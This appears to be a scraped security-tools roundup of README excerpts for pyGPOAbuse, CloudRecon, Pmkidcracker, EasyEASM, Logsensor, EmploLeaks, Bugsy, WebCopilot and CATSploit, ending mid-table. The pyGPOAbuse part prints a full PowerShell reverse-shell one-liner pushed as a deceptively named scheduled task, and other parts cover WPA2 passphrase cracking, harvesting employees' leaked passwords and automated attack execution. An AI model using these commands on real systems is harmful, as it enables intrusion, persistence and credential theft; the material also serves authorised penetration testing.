pyGPOAbuse - Partial Python Implementation Of SharpGPOAbuse

Python partial implementation of SharpGPOAbuse by@pkb1s

This tool can be used when a controlled account can modify an existing GPO that applies to one or more users & computers. It will create an immediate scheduled task as SYSTEM on the remote computer for computer GPO, or as logged in user for user GPO.

Default behavior adds a local administrator.

How to use

Basic usage

Add john user to local administrators group (Password: H4x00r123..)

./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"

Advanced usage

Reverse shell example

./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \ 
    -powershell \ 
    -command "\$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \ 
    -taskname "Completely Legit Task" \
    -description "Dis is legit, pliz no delete" \ 
    -user

Credits

• @pkb1s for SharpGPOAbuse
• @airman604 for schtask_now.py
• @SkelSec for msldap

Download pyGPOAbuse

Read More

CloudRecon - Finding assets from certificates

CloudRecon

Finding assets from certificates! Scan the web! Tool presented @DEFCON 31

Install

** You must have CGO enabled, and may have to install gcc to run CloudRecon**

sudo apt install gcc

go install github.com/g0ldencybersec/CloudRecon@latest

Description

CloudRecon

CloudRecon is a suite of tools for red teamers and bug hunters to find ephemeral and development assets in their campaigns and hunts.

Often, target organizations stand up cloud infrastructure that is not tied to their ASN or related to known infrastructure. Many times these assets are development sites, IT product portals, etc. Sometimes they don't have domains at all but many still need HTTPs.

CloudRecon is a suite of tools to scan IP addresses or CIDRs (ex: cloud providers IPs) and find these hidden gems for testers, by inspecting those SSL certificates.

The tool suite is three parts in GO:

Scrape - A LIVE running tool to inspect the ranges for a keywork in SSL certs CN and SN fields in real time.

Store - a tool to retrieve IPs certs and download all their Orgs, CNs, and SANs. So you can have your OWN cert.sh database.

Retr - a tool to parse and search through the downloaded certs for keywords.

Usage

MAIN

Usage: CloudRecon scrape|store|retr [options]

  -h    Show the program usage message

Subcommands: 

        cloudrecon scrape - Scrape given IPs and output CNs & SANs to stdout
        cloudrecon store - Scrape and collect Orgs,CNs,SANs in local db file
        cloudrecon retr - Query local DB file for results

SCRAPE

scrape [options] -i <IPs/CIDRs or File>
  -a    Add this flag if you want to see all output including failures
  -c int
        How many goroutines running concurrently (default 100)
  -h    print usage!
  -i string
        Either IPs & CIDRs separated by commas, or a file with IPs/CIDRs on each line (default "NONE"                                                                                                                         )
  -p string
        TLS ports to check for certificates (default "443")
  -t int
        Timeout for TLS handshake (default 4)

STORE

store [options] -i <IPs/CIDRs or File>
  -c int
        How many goroutines running concurrently (default 100)
  -db string
        String of the DB you want to connect to and save certs! (default "certificates.db")
  -h    print usage!
  -i string
        Either IPs & CIDRs separated by commas, or a file with IPs/CIDRs on each line (default "NONE")
  -p string
        TLS ports to check for certificates (default "443")
  -t int
        Timeout for TLS handshake (default 4)

RETR

retr [options]
  -all
        Return all the rows in the DB
  -cn string
        String to search for in common name column, returns like-results (default "NONE")
  -db string
        String of the DB you want to connect to and save certs! (default "certificates.db")
  -h    print usage!
  -ip string
        String to search for in IP column, returns like-results (default "NONE")
  -num
        Return the Number of rows (results) in the DB (By IP)
  -org string
        String to search for in Organization column, returns like-results (default "NONE")
  -san string
        String to search for in common name column, returns like-results (default "NONE")

Download CloudRecon

Read More

Pmkidcracker - A Tool To Crack WPA2 Passphrase With PMKID Value Without Clients Or De-Authentication

This program is a tool written in Python to recover the pre-shared key of a WPA2 WiFi network without any de-authentication or requiring any clients to be on the network. It targets the weakness of certain access points advertising the PMKID value in EAPOL message 1.

Program Usage

python pmkidcracker.py -s <SSID> -ap <APMAC> -c <CLIENTMAC> -p <PMKID> -w <WORDLIST> -t <THREADS(Optional)>

NOTE: apmac, clientmac, pmkid must be a hexstring, e.g b8621f50edd9

How PMKID is Calculated

The two main formulas to obtain a PMKID are as follows:

1. Pairwise Master Key (PMK) Calculation: passphrase + salt(ssid) => PBKDF2(HMAC-SHA1) of 4096 iterations
2. PMKID Calculation: HMAC-SHA1[pmk + ("PMK Name" + bssid + clientmac)]

This is just for understanding, both are already implemented in find_pw_chunk and calculate_pmkid.

Obtaining the PMKID

Below are the steps to obtain the PMKID manually by inspecting the packets in WireShark.

*You may use Hcxtools or Bettercap to quickly obtain the PMKID without the below steps. The manual way is for understanding.

To obtain the PMKID manually from wireshark, put your wireless antenna in monitor mode, start capturing all packets with airodump-ng or similar tools. Then connect to the AP using an invalid password to capture the EAPOL 1 handshake message. Follow the next 3 steps to obtain the fields needed for the arguments.

Open the pcap in WireShark:

• Filter with wlan_rsna_eapol.keydes.msgnr == 1 in WireShark to display only EAPOL message 1 packets.
• In EAPOL 1 pkt, Expand IEEE 802.11 QoS Data Field to obtain AP MAC, Client MAC
• In EAPOL 1 pkt, Expand 802.1 Authentication > WPA Key Data > Tag: Vendor Specific > PMKID is below

If access point is vulnerable, you should see the PMKID value like the below screenshot:

Demo Run

Disclaimer

This tool is for educational and testing purposes only. Do not use it to exploit the vulnerability on any network that you do not own or have permission to test. The authors of this script are not responsible for any misuse or damage caused by its use.

Download Pmkidcracker

Read More

EasyEASM - Zero-dollar Attack Surface Management Tool

Zero-dollar attack surface management tool

featured at Black Hat Arsenal 2023 and Recon Village @ DEF CON 2023.

Description

Easy EASM is just that... the easiest to set-up tool to give your organization visibility into its external facing assets.

The industry is dominated by $30k vendors selling "Attack Surface Management," but OG bug bounty hunters and red teamers know the truth. External ASM was born out of the bug bounty scene. Most of these $30k vendors use this open-source tooling on the backend.

With ten lines of setup or less, using open-source tools, and one button deployment, Easy EASM will give your organization a complete view of your online assets. Easy EASM scans you daily and alerts you via Slack or Discord on newly found assets! Easy EASM also spits out an Excel skeleton for a Risk Register or Asset Database! This isn't rocket science, but it's USEFUL. Don't get scammed. Grab Easy EASM and feel confident you know what's facing attackers on the internet.

Installation

go install github.com/g0ldencybersec/EasyEASM/easyeasm@latest

Example config file

The tool expects a configuration file named config.yml to be in the directory you are running from.

Here is example of this yaml file:

# EasyEASM configurations
runConfig:
  domains:  # List root domains here.
    - example.com
    - mydomain.com
  slack: https://hooks.slack.com/services/DUMMYDATA/DUMMYDATA/RANDOM # Slack webhook url for Slack notifications.
  discord: https://discord.com/api/webhooks/DUMMYURL/Dasdfsdf # Discord webhook for Discord notifications.
  runType: fast   # Set to either fast (passive enum) or complete (active enumeration).
  activeWordList: subdomainWordlist.txt
  activeThreads: 100

Usage

To run the tool, fill out the config file: config.yml. Then, run the easyeasm module:

./easyeasm

After the run is complete, you should see the output CSV (EasyEASM.csv) in the run directory. This CSV can be added to your asset database and risk register!

Warranty

The creator(s) of this tool provides no warranty or assurance regarding its performance, dependability, or suitability for any specific purpose.

The tool is furnished on an "as is" basis without any form of warranty, whether express or implied, encompassing, but not limited to, implied warranties of merchantability, fitness for a particular purpose, or non-infringement.

The user assumes full responsibility for employing this tool and does so at their own peril. The creator(s) holds no accountability for any loss, damage, or expenses sustained by the user or any third party due to the utilization of this tool, whether in a direct or indirect manner.

Moreover, the creator(s) explicitly renounces any liability or responsibility for the accuracy, substance, or availability of information acquired through the use of this tool, as well as for any harm inflicted by viruses, malware, or other malicious components that may infiltrate the user's system as a result of employing this tool.

By utilizing this tool, the user acknowledges that they have perused and understood this warranty declaration and agree to undertake all risks linked to its utilization.

License

This project is licensed under the MIT License - see the LICENSE.md for details.

Contact

For assistance, use the Issues tab. If we do not respond within 7 days, please reach out to us here.

• Gunnar Andrews
• Olivia Gallucci
• Jason Haddix

Download EasyEASM

Read More

Logsensor - A Powerful Sensor Tool To Discover Login Panels, And POST Form SQLi Scanning

A Powerful Sensor Tool to discover login panels, and POST Form SQLi Scanning

Features

• login panel Scanning for multiple hosts
• Proxy compatibility (http, https)
• Login panel scanning are done in multiprocessing

so the script is super fast at scanning many urls

quick tutorial & screenshots are shown at the bottom
project contribution tips at the bottom

Installation

git clone https://github.com/Mr-Robert0/Logsensor.git
cd Logsensor && sudo chmod +x logsensor.py install.sh
pip install -r requirements.txt
./install.sh

Dependencies

• re
• bs4
• termcolor
• argparse
• tabulate
• requests

Quick Tutorial

1. Multiple hosts scanning to detect login panels

• You can increase the threads (default 30)
• only run login detector module

python3 logsensor.py -f <subdomains-list> 
python3 logsensor.py -f <subdomains-list> -t 50
python3 logsensor.py -f <subdomains-list>  --login

2. Targeted SQLi form scanning

• can provide only specifc url of login panel with --sqli or -s flag for run only SQLi form scanning Module
• turn on the proxy to see the requests
• customize user input name of login panel with actual name (default "username")

python logsensor.py -u www.example.com/login --sqli 
python logsensor.py -u www.example.com/login -s --proxy http://127.0.0.1:8080
python logsensor.py -u www.example.com/login -s --inputname email

View help

Login panel Detector Module -s, --sqli run only POST Form SQLi Scanning Module with provided Login panels Urls -n , --inputname Customize actual username input for SQLi scan (e.g. 'username' or 'email') -t , --threads Number of threads (default 30) -h, --help Show this help message and exit " dir="auto">

python logsensor.py --help

usage: logsensor.py [-h --help] [--file ] [--url ] [--proxy] [--login] [--sqli] [--threads]

optional arguments:
  -u , --url           Target URL (e.g. http://example.com/ )
  -f , --file          Select a target hosts list file (e.g. list.txt )
  --proxy              Proxy (e.g. http://127.0.0.1:8080)
  -l, --login          run only Login panel Detector Module
  -s, --sqli           run only POST Form SQLi Scanning Module with provided Login panels Urls 
  -n , --inputname     Customize actual username input for SQLi scan (e.g. 'username' or 'email')
  -t , --threads       Number of threads (default 30)
  -h, --help           Show this help message and exit

Screenshots

Development

TODO

1. adding "POST form SQli (Time based) scanning" and check for delay
2. Fuzzing on Url Paths So as not to miss any login panel

Download Logsensor

Read More

EmploLeaks - An OSINT Tool That Helps Detect Members Of A Company With Leaked Credentials

 

This is a tool designed for Open Source Intelligence (OSINT) purposes, which helps to gather information about employees of a company.

How it Works

The tool starts by searching through LinkedIn to obtain a list of employees of the company. Then, it looks for their social network profiles to find their personal email addresses. Finally, it uses those email addresses to search through a custom COMB database to retrieve leaked passwords. You an easily add yours and connect to through the tool.

Installation

To use this tool, you'll need to have Python 3.10 installed on your machine. Clone this repository to your local machine and install the required dependencies using pip in the cli folder:

cd cli
pip install -r requirements.txt

OSX

We know that there is a problem when installing the tool due to the psycopg2 binary. If you run into this problem, you can solve it running:

cd cli
python3 -m pip install psycopg2-binary`

Basic Usage

To use the tool, simply run the following command:

python3 cli/emploleaks.py

If everything went well during the installation, you will be able to start using EmploLeaks:

___________              .__         .__                 __
\_   _____/ _____ ______ |  |   ____ |  |   ____ _____  |  | __  ______
 |    __)_ /     \____  \|  |  /  _ \|  | _/ __ \__   \ |  |/ / /  ___/
 |        \  Y Y  \  |_> >  |_(  <_> )  |_\  ___/ / __ \|    <  \___ \
/_______  /__|_|  /   __/|____/\____/|____/\___  >____  /__|_ \/____  >
        \/      \/|__|                         \/     \/     \/     \/

OSINT tool 🕵  to chain multiple apis
emploleaks>

Right now, the tool supports two functionalities:

• Linkedin, for searching all employees from a company and get their personal emails.
  • A GitLab extension, which is capable of finding personal code repositories from the employees.
• If defined and connected, when the tool is gathering employees profiles, a search to a COMB database will be made in order to retrieve leaked passwords.

Retrieving Linkedin Profiles

First, you must set the plugin to use, which in this case is linkedin. After, you should set your authentication tokens and the run the impersonate process:

emploleaks> use --plugin linkedin
emploleaks(linkedin)> setopt JSESSIONID
JSESSIONID: 
[+] Updating value successfull
emploleaks(linkedin)> setopt li-at
li-at: 
[+] Updating value successfull
emploleaks(linkedin)> show options
Module options:

Name        Current Setting                      Required    Description
----------  -----------------------------------  ----------  -----------------------------------
hide        yes                                  no          hide the JSESSIONID field
JSESSIONID  **************************           no          active cookie session in browser #1
li-at       AQEDAQ74B0YEUS-_AAABilIFFBsAAAGKdhG  no          active cookie session in browser #1
            YG00AxGP34jz1bRrgAcxkXm9RPNeYIAXz3M
            cycrQm5FB6lJ-Tezn8GGAsnl_GRpEANRdPI
            lWTRJJGF9vbv5yZHKOeze_WCHoOpe4ylvET
            kyCyfN58SNNH
emploleaks(linkedin)> run i   mpersonate
[+] Using cookies from the browser
Setting for first time JSESSIONID
Setting for first time li_at

li_at and JSESSIONID are the authentication cookies of your LinkedIn session on the browser. You can use the Web Developer Tools to get it, just sign-in normally at LinkedIn and press right click and Inspect, those cookies will be in the Storage tab.

Now that the module is configured, you can run it and start gathering information from the company:

Get Linkedin accounts + Leaked Passwords

We created a custom workflow, where with the information retrieved by Linkedin, we try to match employees' personal emails to potential leaked passwords. In this case, you can connect to a database (in our case we have a custom indexed COMB database) using the connect command, as it is shown below:

emploleaks(linkedin)> connect --user myuser --passwd mypass123 --dbname mydbname --host 1.2.3.4
[+] Connecting to the Leak Database...
[*] version: PostgreSQL 12.15

Once it's connected, you can run the workflow. With all the users gathered, the tool will try to search in the database if a leaked credential is affecting someone:

As a conclusion, the tool will generate a console output with the following information:

• A list of employees of the company (obtained from LinkedIn)
• The social network profiles associated with each employee (obtained from email address)
• A list of leaked passwords associated with each email address.

How to build the indexed COMB database

An imortant aspect of this project is the use of the indexed COMB database, to build your version you need to download the torrent first. Be careful, because the files and the indexed version downloaded requires, at least, 400 GB of disk space available.

Once the torrent has been completelly downloaded you will get a file folder as following:

├── count_total.sh
├── data
│   ├── 0
│   ├── 1
│   │   ├── 0
│   │   ├── 1
│   │   ├── 2
│   │   ├── 3
│   │   ├── 4
│   │   ├─â&€ 5
│   │   ├── 6
│   │   ├── 7
│   │   ├── 8
│   │   ├── 9
│   │   ├── a
│   │   ├── b
│   │   ├── c
│   │   ├── d
│   │   ├── e
│   │   ├── f
│   │   ├── g
│   │   ├── h
│   │   ├── i
│   │   ├── j
│   │   ├── k
│   │   ├── l
│   │   ├── m
│   │   ├⠀─ n
│   │   ├── o
│   │   ├── p
│   │   ├── q
│   │   ├── r
│   │   ├── s
│   │   ├── symbols
│   │   ├── t

At this point, you could import all those files with the command create_db:

The importer takes a lot of time for that reason we recommend to run it with patience.

Next Steps

We are integrating other public sites and applications that may offer about a leaked credential. We may not be able to see the plaintext password, but it will give an insight if the user has any compromised credential:

• Integration with Have I Been Pwned?
• Integration with Firefox Monitor
• Integration with Leak Check
• Integration with BreachAlarm

Also, we will be focusing on gathering even more information from public sources of every employee. Do you have any idea in mind? Don't hesitate to reach us:

• Javi Aguinaga: jaguinaga@faradaysec.com
• Gabi Franco: gabrielf@faradaysec.com

Or you con DM at @pastacls or @gaaabifranco on Twitter.

Download Emploleaks

Read More

Bugsy - Command-line Interface Tool That Provides Automatic Security Vulnerability Remediation For Your Code

Bugsy is a command-line interface (CLI) tool that provides automatic security vulnerability remediation for your code. It is the community edition version of Mobb, the first vendor-agnostic automated security vulnerability remediation tool. Bugsy is designed to help developers quickly identify and fix security vulnerabilities in their code.

What is Mobb?

Mobb is the first vendor-agnostic automatic security vulnerability remediation tool. It ingests SAST results from Checkmarx, CodeQL (GitHub Advanced Security), OpenText Fortify, and Snyk and produces code fixes for developers to review and commit to their code.

What does Bugsy do?

Bugsy has two modes - Scan (no SAST report needed) & Analyze (the user needs to provide a pre-generated SAST report from one of the supported SAST tools).

Scan

• Uses Checkmarx or Snyk CLI tools to run a SAST scan on a given open-source GitHub/GitLab repo
• Analyzes the vulnerability report to identify issues that can be remediated automatically
• Produces the code fixes and redirects the user to the fix report page on the Mobb platform

Analyze

• Analyzes the a Checkmarx/CodeQL/Fortify/Snyk vulnerability report to identify issues that can be remediated automatically
• Produces the code fixes and redirects the user to the fix report page on the Mobb platform

Disclaimer

This is a community edition version that only analyzes public GitHub repositories. Analyzing private repositories is allowed for a limited amount of time. Bugsy does not detect any vulnerabilities in your code, it uses findings detected by the SAST tools mentioned above.

Usage

You can simply run Bugsy from the command line, using npx:

npx mobbdev

Download Bugsy

Read More

WebCopilot - An Automation Tool That Enumerates Subdomains Then Filters Out Xss, Sqli, Open Redirect, Lfi, Ssrf And Rce Parameters And Then Scans For Vulnerabilities

WebCopilot is an automation tool designed to enumerate subdomains of the target and detect bugs using different open-source tools.

The script first enumerate all the subdomains of the given target domain using assetfinder, sublister, subfinder, amass, findomain, hackertarget, riddler and crt then do active subdomain enumeration using gobuster from SecLists wordlist then filters out all the live subdomains using dnsx then it extract titles of the subdomains using httpx & scans for subdomain takeover using subjack. Then it uses gauplus & waybackurls to crawl all the endpoints of the given subdomains then it use gf patterns to filters out xss, lfi, ssrf, sqli, open redirect & rce parameters from that given subdomains, and then it scans for vulnerabilities on the sub domains using different open-source tools (like kxss, dalfox, openredirex, nuclei, etc). Then it'll print out the result of the scan and save all the output in a specified directory.

Features

• Subdomain Enumeration using assetfinder, sublist3r, subfinder, amass, findomain, etc.
• Active Subdomain Enumeration using gobuster & amass from SecLists/DNS wordlist.
• Extract titles and take screenshots of live subdoamins using aquatone & httpx.
• Crawl all the endpoints of the subdomains using waybackurls & gauplus and filter out XSS, SQLi, SSRF, etc parameters using gf patterns.
• Run different open-source tools (like dalfox, nuclei, sqlmap, etc) to search for vulnerabilities on these parameters and then save all the outputs in the folder.

Usage

g!2m0:~ webcopilot -h

             
                                ──────▄▀▄─────▄▀▄
                                ─────▄█░░▀▀▀▀▀░░█▄
                                ─▄▄──█░░░░░░░░░░░█──▄▄
                                █▄▄█─█░░▀░░┬░░▀░░█─█▄▄█
 ██╗░░░░░░░██╗███████╗██████╗░░█████╗░░█████╗░██████╗░██╗██╗░░░░░░█████╗░████████╗
░██║░░██╗░░██║██╔════╝██╔══██╗██╔══██╗██╔══██╗██╔══██╗██║██║░░░░░██╔══██╗╚══██╔══╝
░╚██╗████╗██╔╝█████╗░░██████╦╝██║░░╚═╝██║░░██║██████╔╝██║██║░░░░░██║░░██║░░░██║░░░
░░████╔═████║░██╔══╝░░██╔══██╗██║░░██╗██║░░██║██╔═══╝░██║██║ ░░░░██║░░██║░░░██║░░░
░░╚██╔╝░╚██╔╝░███████╗██████╦╝╚█████╔╝╚█████╔╝██║░░░░░██║███████╗╚█████╔╝░░░██║░░░
░░░╚═╝░░░╚═╝░░╚══════╝╚═════╝░░╚════╝ ░╚════╝░╚═╝░░░░░╚═╝╚══════╝░╚════╝░░░░╚═╝░░░
                                                      [●] @h4r5h1t.hrs | G!2m0

Usage:
webcopilot -d <target>
webcopilot -d <target> -s
webcopilot [-d target] [-o output destination] [-t threads] [-b blind server URL] [-x exclude domains]

Flags:  
  -d        Add your target [Requried]
  -o        To save outputs in folder [Default: domain.com]
  -t        Number of threads [Default: 100]
  -b        Add your server for BXSS [Default: False]
  -x        Exclude out of scope domains [Default: False]
  -s        Run only Subdomain Enumeration [Default: False]
  -h        Show this help message

Example: webcopilot  -d domain.com -o domain -t 333 -x exclude.txt -b testServer.xss
Use https://xsshunter.com/ or https://interact.projectdiscovery.io/ to get your server

Installing WebCopilot

WebCopilot requires git to install successfully. Run the following command as a root to install webcopilot

git clone https://github.com/h4r5h1t/webcopilot && cd webcopilot/ && chmod +x webcopilot install.sh && mv webcopilot /usr/bin/ && ./install.sh

Tools Used:

SubFinder • Sublist3r • Findomain • gf • OpenRedireX • dnsx • sqlmap • gobuster • assetfinder • httpx • kxss • qsreplace • Nuclei • dalfox • anew • jq • aquatone • urldedupe • Amass • gauplus • waybackurls • crlfuzz

Running WebCopilot

To run the tool on a target, just use the following command.

g!2m0:~ webcopilot -d bugcrowd.com

The -o command can be used to specify an output dir.

g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd

The -s command can be used for only subdomain enumerations (Active + Passive and also get title & screenshots).

g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -s 

The -t command can be used to add thrads to your scan for faster result.

g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333 

The -b command can be used for blind xss (OOB), you can get your server from xsshunter or interact

g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333 -b testServer.xss

The -x command can be used to exclude out of scope domains.

g!2m0:~ echo out.bugcrowd.com > excludeDomain.txt
g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333 -x excludeDomain.txt -b testServer.xss

Example

Default options looks like this:

g!2m0:~ webcopilot -d bugcrowd.com - bugcrowd

                                ──────▄▀▄─────▄▀▄
                                ─────▄█░░▀▀▀▀▀░░█▄
                                ─▄▄──█░░░░░░░░░░░█──▄▄
                                █▄▄█─█░░▀░░┬░░▀░░█─█▄▄█
 ██╗░░░░░░░██╗███████╗██████╗░░█████╗░ █████╗░██████╗░██╗██╗░░░░░░█████╗░████████╗
░██║░░██╗░░██║██╔════╝██╔══██╗██╔══██╗██╔══██╗██╔══██╗██║██║░░░░░██╔══██╗╚══██╔══╝
░╚██╗████╗██╔╝█ ███╗░░██████╦╝██║░░╚═╝██║░░██║██████╔╝██║██║░░░░░██║░░██║░░░██║░░░
░░████╔═████║░██╔══╝░░██╔══██╗██║░░██╗██║░░██║██╔═══╝░██║██║░░░░░██║░░██║░░ ██║░░░
░░╚██╔╝░╚██╔╝░███████╗██████╦╝╚█████╔╝╚█████╔╝██║░░░░░██║███████╗╚█████╔╝░░░██║░░░
░░░╚═╝░░░╚═╝░░╚══════╝╚═════╝░░╚════╝░░╚════╝░╚═╝░░░ ░╚═╝╚══════╝░╚════╝░░░░╚═╝░░░
                                                      [●] @h4r5h1t.hrs | G!2m0


[❌] Warning: Use with caution. You are responsible for your own actions.
[❌] Developers assume no liability and are not responsible for any misuse or damage cause by this tool.


Target:  bugcrowd.com
Output:  /home/gizmo/targets/bugcrowd
Threads: 100
Server:  False
Exclude: False
Mode:    Running all Enumeration
Time:    30-08-2021 15:10:00

[!] Please wait while scanning...

[●] Subdoamin Scanning is in progress: Scanning subdomains of bugcrowd.com
[●] Subdoamin Scanned  -  [assetfinder✔]                 Subdomain Found: 34
[●] Subdoamin Scanned  -  [sublist3r✔]                      Subdomain Found: 29
[●] Subdoamin Scanned  -  [subfinder✔]                   Subdomain Found: 54
[●] Subdoamin Scanned  -  [amass✔]                       Subdomain Found: 43
[●] Subdoamin Scanned  -  [findomain✔]                   Subdomain Found: 27

[●] Active Subdoamin Scanning is in progress:
[!] Please be patient. This may take a while...
[●] Active Subdoamin Scanned  -  [gobuster✔]             Subdomain Found: 11
[●] Active Subdoamin Scanned  -  [amass✔]                Subdomain Found: 0

[●] Subdomain Scanning: Filtering out of scope subdomains
[●] Subdomain Scanning: Filtering Alive subdomains
[●] Subdomain Scanning: Getting titles of valid subdomains
[●] Visual inspection of Subdoamins is completed.        Check: /subdomains/aquatone/

[●] Scanning Completed for Subdomains of bugcrowd.com    Total: 43 |    Alive: 30

[●] Endpoints Scanning Completed for Subdomains of bugcrowd.com  Total: 11032
[●] Vulnerabilities Scanning is in progress: Getting all vulnerabilities of bugcrowd.com
[●] Vulnerabilities Scanned  -  [XSS✔]                   Found: 0
[●] Vulnerabilities Scanned  -  [SQLi✔]                  Found: 0
[●] Vulnerabilities Scanned  -  [LFI✔]                   Found: 0
[●] Vulnerabilities Scanned  -  [CRLF✔]                  Found: 0
[●] Vulnerabilities Scanned  -  [SSRF✔]                  Found: 0
[●] Vulnerabilities Scanned  -  [Sensitive Data✔]        Found: 0
[●] Vulnerabilities Scanned  -  [Open redirect✔]         Found: 0
[●] Vulnerabilities Scanned  -  [Subdomain Takeover✔]    Found: 0
[●] Vulnerabilities Scanned  -  [Nuclie✔]                Found: 0
[●] Vulnerabilities Scanning Completed    for Subdomains of bugcrowd.com    Check: /vulnerabilities/


▒█▀▀█ █▀▀ █▀▀ █░░█ █░░ ▀▀█▀▀
▒█▄▄▀ █▀▀ ▀▀█ █░░█ █░░ ░░█░░
▒█░▒█ ▀▀▀ ▀▀▀ ░▀▀▀ ▀▀▀ ░░▀░░

[+] Subdomains of bugcrowd.com
[+] Subdomains Found: 0
[+] Subdomains Alive: 0
[+] Endpoints: 11032
[+] XSS: 0
[+] SQLi: 0
[+] Open Redirect: 0
[+] SSRF: 0
[+] CRLF: 0
[+] LFI: 0
[+] Sensitive Data: 0
[+] Subdomain Takeover: 0
[+] Nuclei: 0

---

Acknowledgement

WebCopilot is inspired from Garud & Pinaak by ROX4R.

Download Webcopilot

Read More

CATSploit - An Automated Penetration Testing Tool Using Cyber Attack Techniques Scoring

CATSploit is an automated penetration testing tool using Cyber Attack Techniques Scoring (CATS) method that can be used without pentester. Currently, pentesters implicitly made the selection of suitable attack techniques for target systems to be attacked. CATSploit uses system configuration information such as OS, open ports, software version collected by scanner and calculates a score value for capture eVc and detectability eVd of each attack techniques for target system. By selecting the highest score values, it is possible to select the most appropriate attack technique for the target system without hack knack(professional pentester’s skill) .

CATSploit automatically performs penetration tests in the following sequence:

1. Information gathering and prior information input First, gathering information of target systems. CATSploit supports nmap and OpenVAS to gather information of target systems. CATSploit also supports prior information of target systems if you have.

2. Calculating score value of attack techniques Using information obtained in the previous phase and attack techniques database, evaluation values of capture (eVc) and detectability (eVd) of each attack techniques are calculated. For each target computer, the values of each attack technique are calculated.

3. Selection of attack techniques by using scores and make attack scenario Select attack techniques and create attack scenarios according to pre-defined policies. For example, for a policy that prioritized hard-to-detect, the attack techniques with the lowest eVd(Detectable Score) will be selected.

4. Execution of attack scenario CATSploit executes the attack techniques according to attack scenario constructed in the previous phase. CATSploit uses Metasploit as a framework and Metasploit API to execute actual attacks.

Prerequisities

CATSploit has the following prerequisites:

• Kali Linux 2023.2a

Installation

For Metasploit, Nmap and OpenVAS, it is assumed to be installed with the Kali Distribution.

Installing CATSploit

To install the latest version of CATSploit, please use the following commands:

Cloneing and setup

$ git clone https://github.com/catsploit/catsploit.git
$ cd catsploit
$ git clone https://github.com/catsploit/cats-helper.git
$ sudo ./setup.sh

Editing configuration file

CATSploit is a server-client configuration, and the server reads the configuration JSON file at startup. In config.json, the following fields should be modified for your environment.

• DBMS
  • dbname: database name created for CATSploit
  • user: username of PostgreSQL
  • password: password of PostgrSQL
  • host: If you are using a database on a remote host, specify the IP address of the host
• SCENARIO
  • generator.maxscenarios: Maximum number of scenarios to calculate (*)
• ATTACKPF
  • msfpassword: password of MSFRPCD
  • openvas.user: username of PostgreSQL
  • openvas.password: password of PostgreSQL
  • openvas.maxhosts: Maximum number of hosts to be test at the same time (*)
  • openvas.maxchecks: Maximum number of test items to be test at the same time (*)
• ATTACKDB
  • attack_db_dir: Path to the folder where AtackSteps are stored

(*) Adjust the number according to the specs of your machine.

Usage

To start the server, execute the following command:

$ python cats_server.py -c [CONFIG_FILE]

Next, prepare another console, start the client program, and initiate a connection to the server.

$ python catsploit.py -s [SOCKET_PATH]

After successfully connecting to the server and initializing it, the session will start.

   _________  ___________       __      _ __
  / ____/   |/_  __/ ___/____  / /___  (_) /_
 / /   / /| | / /  \__ \/ __ \/ / __ \/ / __/
/ /___/ ___ |/ /  ___/ / /_/ / / /_/ / / /_
\____/_/  |_/_/  /____/ .___/_/\____/_/\__/
                     /_/

[*] Connecting to cats-server
[*] Done.
[*] Initializing server
[*] Done.
catsploit>

The client can execute a variety of commands. Each command can be executed with -h option to display the format of its arguments.

usage: [-h] {host,scenario,scan,plan,attack,post,reset,help,exit} ...

positional arguments:
  {host,scenario,scan,plan,attack,post,reset,help,exit}

options:
  -h, --help       show this help message and exit 

I've posted the commands and options below as well for reference.

host list:
 show information about the hosts
 usage:  host list [-h] 
 options:
  -h, --help       show this help message and exit

host detail:
 show more information about one host
 usage:  host detail [-h] host_id 
 positional arguments:
  host_id          ID of the host for which you want to show information
 options:
  -h, --help       show this help message and exit

scenario list:
 show information about the scenarios
 usage:  scenario list [-h]
 options:
  -h, --help       show this help message and exit

scenario detail:
 show more information about one scenario
 usage:  scenario detail [-h] scenario_id
 positional arguments:
  scenario_id      ID of the scenario for which you want to show information
 options:
  -h, --help       show this help message and exit

scan:
 run network-scan and security-scan
 usage:  scan [-h] [--port PORT] targe   t_host [target_host ...]
 positional arguments:
  target_host      IP address to be scanned
 options:
  -h, --help       show this help message and exit
  --port PORT      ports to be scanned

plan:
 planning attack scenarios
 usage:  plan [-h] src_host_id dst_host_id
 positional arguments:
  src_host_id      originating host
  dst_host_id      target host
 options:
  -h, --help       show this help message and exit

attack:
 execute attack scenario
 usage:  attack [-h] scenario_id
 positional arguments:
  scenario_id      ID of the scenario you want to execute

 options:
  -h, --help       show this help message and exit

post find-secret:
 find confidential information files that can be performed on the pwned host
 usage:  post find-secret [-h] host_id
 positional arguments:
  host_id          ID of the host for which you want to find confidential information
 op   tions:
  -h, --help       show this help message and exit

reset:
 reset data on the server
 usage:  reset [-h] {system} ...
 positional arguments:
  {system}         reset system
options:
  -h, --help  show this help message and exit

exit:
  exit CATSploit
  usage:  exit [-h]
  options:
   -h, --help  show this help message and exit

Examples

In this example, we use CATSploit to scan network, plan the attack scenario, and execute the attack.

catsploit> scan 192.168.0.0/24
Network Scanning ... 100%
[*] Total 2 hosts were discovered.
Vulnerability Scanning ... 100%
[*] Total 14 vulnerabilities were discovered.
catsploit> host list
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━┓
┃ hostID   ┃ IP             ┃ Hostname ┃ Platform                         ┃ Pwned ┃
┡━━━━━━ ━━━╇━━━━━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━┩
│ attacker │ 0.0.0.0        │ kali     │ kali 2022.4                      │ True  │
